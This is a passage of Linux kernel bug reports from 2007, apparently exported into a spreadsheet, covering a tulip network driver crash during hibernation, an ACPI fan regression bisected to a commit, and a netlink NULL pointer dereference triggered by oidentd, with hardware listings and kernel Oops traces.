: Video RAM area 000c0000-000c7fff : Video ROM 000c8000-000c9fff : pnp 00:00 000f0000-000fffff : System ROM 00100000-17feffff : System RAM 00100000-00309b3a : Kernel code 00309b3b-003d4f6b : Kernel data 17ff0000-17ff2fff : ACPI Non-volatile Storage 17ff3000-17ffffff : ACPI Tables 20000000-2001ffff : 0000:00:0f.0 d8000000-dbffffff : 0000:00:00.0 dc000000-dcffffff : 0000:00:0f.0 dc000000-dc3fffff : vesafb de000000-de01ffff : 0000:00:13.0 df000000-df01ffff : 0000:00:14.0 e0000000-e003ffff : 0000:00:12.0 e0000000-e003ffff : au8830 e0040000-e0040fff : 0000:00:0f.0 e0041000-e00413ff : 0000:00:14.0 e0041000-e00413ff : tulip e0042000-e00423ff : 0000:00:13.0 e0042000-e00423ff : tulip ffff0000-ffffffff : reserved /proc/interrupts: CPU0 0: 386801 XT-PIC-XT timer 1: 42 XT-PIC-XT i8042 2: 0 XT-PIC-XT cascade 5: 1 XT-PIC-XT acpi 6: 5 XT-PIC-XT floppy 7: 0 XT-PIC-XT parport0 8: 1 XT-PIC-XT rtc 10: 30561 XT-PIC-XT au8830 11: 27583 XT-PIC-XT uhci_hcd:usb1, eth0 14: 138592 XT-PIC-XT ide0 15: 11574 XT-PIC-XT ide1 NMI: 0 ERR: 0 lspci -vvv: 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev 82) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 0 Region 0: Memory at d8000000 (32-bit, prefetchable) [size=64M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:07.0 ISA bridge: VIA Technologies, Inc. VT82C596 ISA [Mobile South] (rev 12) Subsystem: VIA Technologies, Inc. VT82C596/A/B PCI to ISA Bridge Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] Region 4: I/O ports at d000 [size=16] 00:07.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 08) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at d400 [size=32] 00:07.3 Host bridge: VIA Technologies, Inc. VT82C596 Power Management (rev 20) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:0f.0 VGA compatible controller: ATI Technologies Inc 3D Rage II+ 215GTB [Mach64 GTB] (rev 9a) (prog-if 00 [VGA]) Subsystem: ATI Technologies Inc 3D Rage II+ 215GTB [Mach64 GTB] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min), Cache Line Size: 32 bytes Region 0: Memory at dc000000 (32-bit, non-prefetchable) [size=16M] Region 1: I/O ports at dc00 [size=256] Region 2: Memory at e0040000 (32-bit, non-prefetchable) [size=4K] [virtual] Expansion ROM at 20000000 [disabled] [size=128K] 00:12.0 Multimedia audio controller: Aureal Semiconductor Vortex 2 (rev fe) Subsystem: Aureal Semiconductor AU8830 Vortex 3D Digital Audio Processor Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1000ns min, 3000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at e0000000 (32-bit, non-prefetchable) [size=256K] Region 1: I/O ports at e000 [size=8] Region 2: I/O ports at e400 [size=8] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI+ D1- D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:13.0 Ethernet controller: ADMtek NC100 Network Everywhere Fast Ethernet 10/100 (rev 11) Subsystem: Accton Technology Corporation Unknown device 1216 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (63750ns min, 63750ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at e800 [size=256] Region 1: Memory at e0042000 (32-bit, non-prefetchable) [size=1K] Expansion ROM at de000000 [disabled] [size=128K] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:14.0 Ethernet controller: Microsoft Corporation Unknown device 0002 (rev 11) Subsystem: Microsoft Corporation Unknown device 0002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (16000ns min, 32000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 12 Region 0: I/O ports at ec00 [size=256] Region 1: Memory at e0041000 (32-bit, non-prefetchable) [size=1K] Expansion ROM at df000000 [disabled] [size=128K] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=100mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Software Environment: Hibernate Script 1.93 Linux thursday 2.6.22.5 #1 Thu Aug 23 10:59:50 EDT 2007 i686 GNU/Linux Gnu C 4.1.2 Gnu make 3.81 binutils 2.17 util-linux 2.12r mount 2.12r module-init-tools 3.3-pre2 e2fsprogs 1.40-WIP Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.97 udev 105 Modules Loaded lp thermal fan button processor ac battery sha1 arc4 ecb blkcipher cryptomgr ppp_mppe ppp_generic slhc eeprom w83781d hwmon_vid i2c_viapro i2c_core snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss usbhid snd_au8830 8250_pnp snd_ac97_codec 8250 snd_pcm snd_timer snd_page_alloc ac97_bus snd_mpu401_uart snd_rawmidi snd_seq_device serial_core tulip snd uhci_hcd Problem Description: The kernel reports an Oops in the tulip driver while hibernating, but not every time. (It occurs perhaps 30% to 50% of the time.) The system hangs, caps lock and scroll lock flash, and the computer has to be powered off by holding down the power button. The original bug report (before reproducing the problem with swsusp) is on the Suspend2 bugzilla at: http://bugzilla.suspend2.net/show_bug.cgi?id=294 I am using the hibernate shell script to suspend the system. I will attach a photo of the Oops report from 2.6.22.5 to this bug, but there are several additional ones from older kernels on the original bug page. Speculation: The network card is on a shared interrupt with the USB controller, so it may be receiving unexpected interrupts generated by USB. Steps to reproduce: 1. Try suspending to disk. 2. Experience kernel Oops (but not every time). Here is an Oops report from kernel 2.6.21.1 that I sent in a private mail concerning the bug: Clocksource tsc unstable (delta = 4144113840505 ns) pnp: Device 00:08 activated. pnp: Device 00:09 activated. pnp: Device 00:0a activated. pnp: Failed to activate device 00:0b. usbdev1.2_ep00: PM: resume from 0, parent 1-1 still 1 usbhid 1-1:1.0: PM: resume from 1, parent 1-1 still 1 usbdev1.2_ep01: PM: resume from 0, parent 1-1:1.0 still 1 usbdev1.2: PM: resume from 0, parent 1-1 still 1 Restarting tasks ... &lt;6&gt;usb 1-1: USB disconnect, address 2 done. Stopping tasks ... done. Shrinking memory... -&lt;1&gt;BUG: unable to handle kernel NULL pointer dereference at virtual address 0000008c printing eip: d883e960 *pde = 00000000 Ooops: 0000 [#1] Modules linked in: lp thermal fan processor ac battery sha1 arc4 ecb blkcipher cryptomgr ppp_mppe ppp_generic slhc eeprom w83781d hwmon_vid i2c_isa i2c_viapro i2c_core usbhid 8250_pnp 8250 serial_core uhci_hcd snd_page_alloc ac97_bus tulip CPU: 0 EIP: 0060:[&lt;d883e960&gt;] Not tainted VLI EFLGS: 00010286 (2.6.21.1 #1) EIP is at tulip_interrupt+0x29b/0xb37 [tulip] eax: 00000000 ebx: cfde7aa0 ecx: 0000003c edx: d7c68000 esi: 00000035 edi: d768ca12 ebp: d7c68340 esp: c03c9ee4 ds: 007b es: 007b fs: 00d8 gs: 0000 ss: 0068 Process swapper (pid: 0, ti=c03c8000 task=c03a3380 task.ti=c03c8000) Stack: ffffffff c03a6b40 c0126d99 6c3a9c20 00003d3f 80750c34 6c776d00 0001e828 d7c68000 0001e800 fc69c0d0 00000000 00000000 00000000 00000019 c011a58f 0000003c 00000000 0000007f d7b28220 00000000 00000000 0000000b c012f8a8 Call Trace: [&lt;c0126d99&gt;] tick_program_event+0x2a/0x49 [&lt;c011a58f&gt;] run_timer_softirq+0x11/0x12f [&lt;c012f8a8&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01308d4&gt;] handl_level_irq+0x5c/0x94 [&lt;c0105530&gt;] do_IRQ+0x54/0x70 [&lt;c0103cab&gt;] common_interrupt+0x23/0x28 [&lt;c02000d8&gt;] acpi_ds_create_node+0x45/0x55 [&lt;d8c1fe6a&gt;] acpi_processor_idle+0x1a7/0x335 [processor] [&lt;c0102327&gt;] cpu_idle+0x39/0x4e [&lt;c03caacb&gt;] start_kernel+0x33b/0x343 [&lt;c03ca42b&gt;] unknown_bootoption+0x0/0x202 Code: 00 8b 80 90 00 00 00 8b 54 24 20 83 c7 12 83 c0 12 89 bb 8c 00 00 00 89 53 14 89 83 90 00 00 00 8b 84 f5 18 01 00 00 8b 4c 24 40 &lt;8b&gt; b0 8c 00 00 00 c1 e9 02 f3 a5 8b 4c 24 40 83 e1 03 74 02 f3 EIP: [&lt;d883e960&gt;] tulip_interrupt+0x29b/0xb37 [tulip] SS:ESP 0068:c03c9ee4 Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>regression: fan doesn't work anymore</t>
  </si>
  <si>
    <t>2.6.23-rc4</t>
  </si>
  <si>
    <t>2007-08-29 13:47 UTC</t>
  </si>
  <si>
    <t>2008-10-17 21:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23-rc2 (maybe rc3) Distribution: ubuntu Hardware Environment: Toshiba Tecra 8000 Laptop (P3) Software Environment: Problem Description: the fan doesn't work any more...isected it to that one: cd8c93a4e04dce8f00d1ef3a476aac8bd65ae40b is first bad commit commit cd8c93a4e04dce8f00d1ef3a476aac8bd65ae40b Author: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Date: Fri Aug 3 17:52:48 2007 -0400 ACPI: EC: If ECDT is not found, look up EC in DSDT. Some ASUS laptops access EC space from device _INI methods, but do not provide ECDT for early EC setup. In order to make them function properly, there is a need to find EC is DSDT before any _INI is called. Similar functionality was turned on by acpi_fake_ecdt=1 command line before. Now it is on all the time. http://bugzilla.kernel.org/show_bug.cgi?id=8598 Signed-off-by: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; Steps to reproduce: boot (or try to)</t>
  </si>
  <si>
    <t>BUG triggered by oidentd in netlink code</t>
  </si>
  <si>
    <t>2007-08-30 07:41 UTC</t>
  </si>
  <si>
    <t>Athanasius</t>
  </si>
  <si>
    <t>2007-12-05 00:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.2 Distribution: Debian/Etch Hardware Environment: uk2.net host server lspci says-&gt; 00:00.0 Host bridge: Intel Corporation 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface (rev 03) 00:02.0 VGA compatible controller: Intel Corporation 82845G/GL[Brookdale-G]/GE Chipset Integrated Graphics Device (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 82) 00:1f.0 ISA bridge: Intel Corporation 82801DB/DBL (ICH4/ICH4-L) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801DB (ICH4) IDE Controller (rev 02) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 02) 03:06.0 RAID bus controller: 3ware Inc 7xxx/8xxx-series PATA/SATA-RAID (rev 01) 03:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Software Environment: oidentd Problem Description: Something in oidentd's use of netlink is triggering a BUG Steps to reproduce: Setup a Debian/Etch box, install oidentd, run a 2.6.22.3 kernel, ensure there are sufficient connections to the oidentd service and wait. 'Oops' output: Aug 29 23:28:44 bowl kernel: [349587.500440] BUG: unable to handle kernel NULL pointer dereference&lt;1&gt;BUG: unable to handle kernel NULL pointer dereference at virtual address 00000054 Aug 29 23:28:44 bowl kernel: [349587.500454] printing eip: Aug 29 23:28:45 bowl kernel: [349587.500457] c03318ae Aug 29 23:28:45 bowl kernel: [349587.500459] *pde = 00000000 Aug 29 23:28:45 bowl kernel: [349587.500464] Oops: 0000 [#1] Aug 29 23:28:45 bowl kernel: [349587.500466] PREEMPT SMP Aug 29 23:28:46 bowl kernel: [349587.500474] Modules linked in: w83627hf hwmon_vid i2c_isa Aug 29 23:28:46 bowl kernel: [349587.500483] CPU: 0 Aug 29 23:28:47 bowl kernel: [349587.500485] EIP: 0060:[&lt;c03318ae&gt;] Not tainted VLI Aug 29 23:28:47 bowl kernel: [349587.500487] EFLAGS: 00010246 (2.6.22.3 #1) Aug 29 23:28:47 bowl kernel: [349587.500499] EIP is at netlink_rcv_skb+0xa/0x7e Aug 29 23:28:48 bowl kernel: [349587.500506] eax: 00000000 ebx: 00000000 ecx: c148d2a0 edx: c0398819 Aug 29 23:28:48 bowl kernel: [349587.500510] esi: 00000000 edi: c0398819 ebp: c7a21c8c esp: c7a21c80 Aug 29 23:28:48 bowl kernel: [349587.500517] ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Aug 29 23:28:50 bowl kernel: [349587.500521] Process oidentd (pid: 17943, ti=c7a20000 task=cee231c0 task.ti=c7a20000) Aug 29 23:28:51 bowl kernel: [349587.500527] Stack: 00000000 c7a21cac f7c8ba78 c7a21ca4 c0331962 c0398819 f7c8ba00 0000004c Aug 29 23:28:52 bowl kernel: [349587.500542] f736f000 c7a21cb4 c03988e3 00000001 f7c8ba00 c7a21cc4 c03312a5 0000004c Aug 29 23:28:54 bowl kernel: [349587.500558] f7c8ba00 c7a21cd4 c0330681 f7c8ba00 e4695280 c7a21d00 c03307c6 7fffffff Aug 29 23:28:54 bowl kernel: [349587.500578] Call Trace: Aug 29 23:28:54 bowl kernel: [349587.500581] [&lt;c010361a&gt;] show_trace_log_lvl+0x1c/0x33 Aug 29 23:28:55 bowl kernel: [349587.500591] [&lt;c01036d4&gt;] show_stack_log_lvl+0x8d/0xaa Aug 29 23:28:57 bowl kernel: [349587.500595] [&lt;c010390e&gt;] show_registers+0x1cb/0x321 Aug 29 23:28:59 bowl kernel: [349587.500604] [&lt;c0103bff&gt;] die+0x112/0x1e1 Aug 29 23:29:00 bowl kernel: [349587.500607] [&lt;c01132d2&gt;] do_page_fault+0x229/0x565 Aug 29 23:29:05 bowl kernel: [349587.500618] [&lt;c03c8d3a&gt;] error_code+0x72/0x78 Aug 29 23:29:07 bowl kernel: [349587.500625] [&lt;c0331962&gt;] netlink_run_queue+0x40/0x76 Aug 29 23:29:07 bowl kernel: [349587.500632] [&lt;c03988e3&gt;] inet_diag_rcv+0x1f/0x2c Aug 29 23:29:07 bowl kernel: [349587.500639] [&lt;c03312a5&gt;] netlink_data_ready+0x57/0x59 Aug 29 23:29:08 bowl kernel: [349587.500643] [&lt;c0330681&gt;] netlink_sendskb+0x24/0x45 Aug 29 23:29:08 bowl kernel: [349587.500651] [&lt;c03307c6&gt;] netlink_unicast+0x100/0x116 Aug 29 23:29:08 bowl kernel: [349587.500656] [&lt;c0330f83&gt;] netlink_sendmsg+0x1c2/0x280 Aug 29 23:29:09 bowl kernel: [349587.500664] [&lt;c02fcce9&gt;] sock_sendmsg+0xba/0xd5 Aug 29 23:29:12 bowl kernel: [349587.500671] [&lt;c02fe4d1&gt;] sys_sendmsg+0x17b/0x1e8 Aug 29 23:29:12 bowl kernel: [349587.500676] [&lt;c02fe92d&gt;] sys_socketcall+0x230/0x24d Aug 29 23:29:13 bowl kernel: [349587.500684] [&lt;c01028d2&gt;] syscall_call+0x7/0xb Aug 29 23:29:13 bowl kernel: [349587.500691] ======================= Aug 29 23:29:13 bowl kernel: [349587.500693] Code: f0 ff 4e 18 0f 94 c0 84 c0 0f 84 66 ff ff ff 89 f0 e8 86 e2 fc ff e9 5a ff ff ff f0 ff 40 10 eb be 55 89 e5 57 89 d7 56 89 c6 53 &lt;8b&gt; 50 54 83 fa 10 72 55 8b 9e 9c 00 00 00 31 c9 8b 03 83 f8 0f Aug 29 23:29:13 bowl kernel: [349587.500770] EIP: [&lt;c03318ae&gt;] netlink_rcv_skb+0xa/0x7e SS:ESP 0068:c7a21c80 Aug 29 23:29:13 bowl kernel: [349587.501851] at virtual address 00000054 Aug 29 23:29:13 bowl kernel: [349587.501913] printing eip: Aug 29 23:29:14 bowl kernel: [349587.501963] c03318ae Aug 29 23:29:14 bowl kernel: [349587.502022] *pde = 00000000 Aug 29 23:29:15 bowl kernel: [349587.502079] Oops: 0000 [#2] Aug 29 23:29:15 bowl kernel: [349587.502136] PREEMPT SMP Aug 29 23:29:15 bowl kernel: [349587.502271] Modules linked in: w83627hf hwmon_vid i2c_isa Aug 29 23:29:16 bowl kernel: [349587.502489] CPU: 1 Aug 29 23:29:16 bowl kernel: [349587.502490] EIP: 0060:[&lt;c03318ae&gt;] Not tainted VLI Aug 29 23:29:17 bowl kernel: [349587.502491] EFLAGS: 00010246 (2.6.22.3 #1) Aug 29 23:29:17 bowl kernel: [349587.502647] EIP is at netlink_rcv_skb+0xa/0x7e Aug 29 23:29:17 bowl kernel: [349587.502691] eax: 00000000 ebx: 00000000 ecx: c14346a0 edx: c0398819 Aug 29 23:29:17 bowl kernel: [349587.502737] esi: 00000000 edi: c0398819 ebp: e37f3c8c esp: e37f3c80 Aug 29 23:29:17 bowl kernel: [349587.502783] ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Aug 29 23:29:17 bowl kernel: [349587.502828] Process oidentd (pid: 17945, ti=e37f2000 task=dc69e6e0 task.ti=e37f2000) Aug 29 23:29:18 bowl kernel: [349587.502875] Stack: 00000000 e37f3cac f7c8ba78 e37f3ca4 c0331962 c0398819 f7c8ba00 0000004c Aug 29 23:29:18 bowl kernel: [349587.503198] f736f000 e37f3cb4 c03988e3 00000001 f7c8ba00 e37f3cc4 c03312a5 0000004c Aug 29 23:29:18 bowl kernel: [349587.503519] f7c8ba00 e37f3cd4 c0330681 f7c8ba00 e1a35a80 e37f3d00 c03307c6 7fffffff Aug 29 23:29:18 bowl kernel: [349587.503839] Call Trace: Aug 29 23:29:18 bowl kernel: [349587.503917] [&lt;c010361a&gt;] show_trace_log_lvl+0x1c/0x33 Aug 29 23:29:18 bowl kernel: [349587.503994] [&lt;c01036d4&gt;] show_stack_log_lvl+0x8d/0xaa Aug 29 23:29:18 bowl kernel: [349587.504067] [&lt;c010390e&gt;] show_registers+0x1cb/0x321 Aug 29 23:29:18 bowl kernel: [349587.504142] [&lt;c0103bff&gt;] die+0x112/0x1e1 Aug 29 23:29:18 bowl kernel: [349587.504215] [&lt;c01132d2&gt;] do_page_fault+0x229/0x565 Aug 29 23:29:18 bowl kernel: [349587.504290] [&lt;c03c8d3a&gt;] error_code+0x72/0x78 Aug 29 23:29:18 bowl kernel: [349587.504366] [&lt;c0331962&gt;] netlink_run_queue+0x40/0x76 Aug 29 23:29:18 bowl kernel: [349587.504440] [&lt;c03988e3&gt;] inet_diag_rcv+0x1f/0x2c Aug 29 23:29:18 bowl kernel: [349587.504514] [&lt;c03312a5&gt;] netlink_data_ready+0x57/0x59 Aug 29 23:29:18 bowl kernel: [349587.504589] [&lt;c0330681&gt;] netlink_sendskb+0x24/0x45 Aug 29 23:29:18 bowl kernel: [349587.504662] [&lt;c03307c6&gt;] netlink_unicast+0x100/0x116 Aug 29 23:29:19 bowl kernel: [349587.504736] [&lt;c0330f83&gt;] netlink_sendmsg+0x1c2/0x280 Aug 29 23:29:19 bowl kernel: [349587.504809] [&lt;c02fcce9&gt;] sock_sendmsg+0xba/0xd5 Aug 29 23:29:19 bowl kernel: [349587.504885] [&lt;c02fe4d1&gt;] sys_sendmsg+0x17b/0x1e8 Aug 29 23:29:19 bowl kernel: [349587.504958] [&lt;c02fe92d&gt;] sys_socketcall+0x230/0x24d Aug 29 23:29:19 bowl kernel: [349587.505032] [&lt;c01028d2&gt;] syscall_call+0x7/0xb Aug 29 23:29:19 bowl kernel: [349587.505105] ======================= Aug 29 23:29:19 bowl kernel: [349587.505146] Code: f0 ff 4e 18 0f 94 c0 84 c0 0f 84 66 ff ff ff 89 f0 e8 86 e2 fc ff e9 5a ff ff ff f0 ff 40 10 eb be 55 89 e5 57 89 d7 56 89 c6 53 &lt;8b&gt; 50 54 83 fa 10 72 55 8b 9e 9c 00 00 00 31 c9 8b 03 83 f8 0f Aug 29 23:29:19 bowl kernel: [349587.507160] EIP: [&lt;c03318ae&gt;] netlink_rcv_skb+0xa/0x7e SS:ESP 0068:e37f3c80 Aug 29 23:43:48 bowl kernel: [350485.786725] BUG: unable to handle kernel NULL pointer dereference&lt;1&gt;BUG: unable to handle kernel NULL pointer dereference at virtual address 00000054 Aug 29 23:43:48 bowl kernel: [350485.786739] printing eip: Aug 29 23:43:48 bowl kernel: [350485.786743] c03318ae Aug 29 23:43:48 bowl kernel: [350485.786745] *pde = 00000000 Aug 29 23:43:48 bowl kernel: [350485.786750] Oops: 0000 [#3] Aug 29 23:43:49 bowl kernel: [350485.786751] PREEMPT SMP Aug 29 23:43:49 bowl kernel: [350485.786755] Modules linked in: w83627hf hwmon_vid i2c_isa Aug 29 23:43:49 bowl kernel: [350485.786763] CPU: 0 Aug 29 23:43:49 bowl kernel: [350485.786765] EIP: 0060:[&lt;c03318ae&gt;] Not tainted VLI Aug 29 23:43:49 bowl kernel: [350485.786766] EFLAGS: 00010246 (2.6.22.3 #1) Aug 29 23:43:49 bowl kernel: [350485.786781] EIP is at netlink_rcv_skb+0xa/0x7e Aug 29 23:43:49 bowl kernel: [350485.786785] eax: 00000000 ebx: 00000000 ecx: c148d2a0 edx: c0398819 Aug 29 23:43:49 bowl kernel: [350485.786789] esi: 00000000 edi: c0398819 ebp: dee05c8c esp: dee05c80 Aug 29 23:43:50 bowl kernel: [350485.786792] ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Aug 29 23:43:50 bowl kernel: [350485.786795] Process oidentd (pid: 21495, ti=dee04000 task=dc69e6e0 task.ti=dee04000) Aug 29 23:43:50 bowl kernel: [350485.786798] Stack: 00000000 dee05cac f7c8ba78 dee05ca4 c0331962 c0398819 f7c8ba00 0000004c Aug 29 23:43:50 bowl kernel: [350485.786807] f736f000 dee05cb4 c03988e3 00000001 f7c8ba00 dee05cc4 c03312a5 0000004c Aug 29 23:43:51 bowl kernel: [350485.786816] f7c8ba00 dee05cd4 c0330681 f7c8ba00 e4695980 dee05d00 c03307c6 7fffffff Aug 29 23:43:51 bowl kernel: [350485.786829] Call Trace: Aug 29 23:43:51 bowl kernel: [350485.786832] [&lt;c010361a&gt;] show_trace_log_lvl+0x1c/0x33 Aug 29 23:43:51 bowl kernel: [350485.786839] [&lt;c01036d4&gt;] show_stack_log_lvl+0x8d/0xaa Aug 29 23:43:52 bowl kernel: [350485.786844] [&lt;c010390e&gt;] show_registers+0x1cb/0x321 Aug 29 23:43:52 bowl kernel: [350485.786848] [&lt;c0103bff&gt;] die+0x112/0x1e1 Aug 29 23:43:52 bowl kernel: [350485.786852] [&lt;c01132d2&gt;] do_page_fault+0x229/0x565 Aug 29 23:43:52 bowl kernel: [350485.786859] [&lt;c03c8d3a&gt;] error_code+0x72/0x78 Aug 29 23:43:52 bowl kernel: [350485.786870] [&lt;c0331962&gt;] netlink_run_queue+0x40/0x76 Aug 29 23:43:52 bowl kernel: [350485.786875] [&lt;c03988e3&gt;] inet_diag_rcv+0x1f/0x2c Aug 29 23:43:52 bowl kernel: [350485.786880] [&lt;c03312a5&gt;] netlink_data_ready+0x57/0x59 Aug 29 23:43:53 bowl kernel: [350485.786885] [&lt;c0330681&gt;] netlink_sendskb+0x24/0x45 Aug 29 23:43:53 bowl kernel: [350485.786889] [&lt;c03307c6&gt;] netlink_unicast+0x100/0x116 Aug 29 23:43:53 bowl kernel: [350485.786893] [&lt;c0330f83&gt;] netlink_sendmsg+0x1c2/0x280 Aug 29 23:43:53 bowl kernel: [350485.786898] [&lt;c02fcce9&gt;] sock_sendmsg+0xba/0xd5 Aug 29 23:43:53 bowl kernel: [350485.786909] [&lt;c02fe4d1&gt;] sys_sendmsg+0x17b/0x1e8 Aug 29 23:43:53 bowl kernel: [350485.786914] [&lt;c02fe92d&gt;] sys_socketcall+0x230/0x24d Aug 29 23:43:53 bowl kernel: [350485.786919] [&lt;c01028d2&gt;] syscall_call+0x7/0xb Aug 29 23:43:53 bowl kernel: [350485.786923] ======================= Aug 29 23:43:53 bowl kernel: [350485.786926] Code: f0 ff 4e 18 0f 94 c0 84 c0 0f 84 66 ff ff ff 89 f0 e8 86 e2 fc ff e9 5a ff ff ff f0 ff 40 10 eb be 55 89 e5 57 89 d7 56 89 c6 53 &lt;8b&gt; 50 54 83 fa 10 72 55 8b 9e 9c 00 00 00 31 c9 8b 03 83 f8 0f Aug 29 23:43:53 bowl kernel: [350485.786976] EIP: [&lt;c03318ae&gt;] netlink_rcv_skb+0xa/0x7e SS:ESP 